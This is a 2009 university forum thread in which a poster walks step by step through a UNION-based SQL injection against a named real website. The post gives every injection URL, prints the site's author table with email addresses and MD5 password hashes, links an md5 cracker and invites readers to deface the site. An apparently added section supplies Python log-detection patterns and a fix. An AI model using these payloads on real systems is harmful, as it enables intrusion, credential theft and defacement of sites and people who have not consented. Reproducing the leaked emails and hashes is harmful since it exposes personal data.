UNKLAB FORUM

Klabat University Students & Alumni Forum
 
     [again] injecting with sql

    jzt.nwbie (Administrator), Tue Apr 07, 2009 1:36 am

    =================================================
    dork : inurl:"mod.php?mod=publisher
    place : myR00M
    location : A****A
    time : 00:35 wib
    =================================================

    /* ACTION START */

    step by step

    1. find a target:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46

    2. check for the bug:
    code : ' or -
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46'

    if there is an error (warning) like this:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in home/flora/public_html/mod/publisher/publisher.php on line 309

    it means it can be injected; if there is no warning...
    look for another target... you have to be patient...

    NEXT ( --> ONCE YOU HAVE THE TARGET )

    3. count the number of tables:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+1
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+2
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+3
    -->etc
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11
    -->end

    in the end, it stops at 11... meaning there are 10 columns

    4. find the lottery number:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,3,4,5,6,7,8,9,10--

    result: the number we get is 3

    5. find out the version:
    code = @@version or version()

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10--

    6. find the table names:
    code = group_concat(table_name)
    +from+information_schema.tables+where+table_schema=database()--

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

    and out come the tables...
    authors,banner,bannerclient,counter,exchange_links,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_components,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_

    7. find the column names in the chosen table (choice = authors):
    code = group_concat(column_name)
    +from+information_schema.columns+where+table_name=0x[column name converted from ascii to hex]--

    beforehand, convert the ascii code of the table whose columns will be viewed.

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns+where+table_name=0x617574686f7273--

    8. view the table contents
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),4,5,6,7,8,9,10%20from%20authors

    the result:
    florakita:florakita::anantakarna@yahoo.com:979c8e8f8271e3431249f935cd7d3f4c:7,admin:admin::admin@admin.com:e6db7f33faf25a5dee7492f20b50b48d:13,duniaflora:editor::info@duniaflora.com:979c8e8f8271e3431249f935cd7d3f4c:27

    all that's left is to decrypt the md5 pwd...

    ===============================================================================================================================================
    /* END OF ACTION */

    that's as far as I go...
    too lazy to deface right now, already sleepy...
    if you want to carry on to a deface, go ahead, friends...
    be my guest...


    now, it's time for me to sleep GUYZ...
    have a nice dream...
    see ya, tomorrow

    ===============================================================================

    -=THANKS=-
    - JC, FOR HIS BLESSING TO ME
    - MY_B3L0V3D_M0M... LUV U
    - MY_F4M1LY_BR0TH3R5_n_515T3R5...
    - MY_GIRL_b094

    -=GREETZ=-
    * All UnKlab Forum Members
    * All Hackers-Center Members

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    N.B:

    - Ascii to Hexa Converter
    http://www.dolcevie.com/js/converter.html
    - md5 crack
    http://thesoftwareengineer.org/services/md5.php

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    _________________
    wanna be computer geek, nerd, etc...!!!
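
For the defending side, the request sequence in the post above leaves a recognisable trail in the web server's access log. The following is an added example, not part of the original post: it classifies each request by the stage it matches and flags clients that progress through several stages. The log lines, IP addresses, function names and the `min_stages` threshold are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Stage signatures taken from the steps in the post; most specific first.
STAGES = [
    ("schema_enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("quote_probe", re.compile(r"^-?\d+'$")),
]
# Client IP and request target from a Combined Log Format line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

def classify(request_target):
    """Return the first matching stage for any decoded query value, else None."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    for values in params.values():
        for value in values:  # parse_qs already decoded '+' and %xx
            for stage, pattern in STAGES:
                if pattern.search(value):
                    return stage
    return None

def suspicious_clients(log_lines, min_stages=2):
    """Map client IP -> distinct stages in order seen, for clients that
    reached at least min_stages stages (one stray quote alone is not flagged)."""
    seen = {}
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        stage = classify(m.group(2))
        if stage and stage not in seen.setdefault(m.group(1), []):
            seen[m.group(1)].append(stage)
    return {ip: s for ip, s in seen.items() if len(s) >= min_stages}

# Constructed sample log (documentation IP ranges, not real traffic).
P = "/mod.php?mod=publisher&op=viewarticle&cid=&artid="
SAMPLE_LOG = [
    '198.51.100.20 - - [07/Apr/2009:00:30:10 +0700] "GET ' + P + '46 HTTP/1.1" 200 9120',
    '198.51.100.21 - - [07/Apr/2009:00:31:44 +0700] "GET ' + P + '12\' HTTP/1.1" 200 640',
    '203.0.113.7 - - [07/Apr/2009:00:35:01 +0700] "GET ' + P + '46\' HTTP/1.1" 200 512',
    '203.0.113.7 - - [07/Apr/2009:00:35:20 +0700] "GET ' + P + '-46+order+by+11 HTTP/1.1" 200 512',
    '203.0.113.7 - - [07/Apr/2009:00:36:02 +0700] "GET ' + P + '-46+union+all+select+1,2,3,4,5,6,7,8,9,10-- HTTP/1.1" 200 8800',
    '203.0.113.7 - - [07/Apr/2009:00:37:15 +0700] "GET ' + P + '-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 9400',
]

if __name__ == "__main__":
    for ip, stages in suspicious_clients(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

Detection of this kind only shows that probing happened; the warning quoted in step 2 points at the underlying fault, a query built from the raw `artid` value, which is closed by casting the parameter to an integer or binding it in a prepared statement.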

    ZaNo (Whiz), Sun Apr 19, 2009 11:19 am

    nice tutorial..
    btw does that site use eNdonesia CMS?

    dropping in the Proof Of Concept video for it..
    http://www.kitaupload.com/download.php?file=971SQL_Injection_HOWTO.rar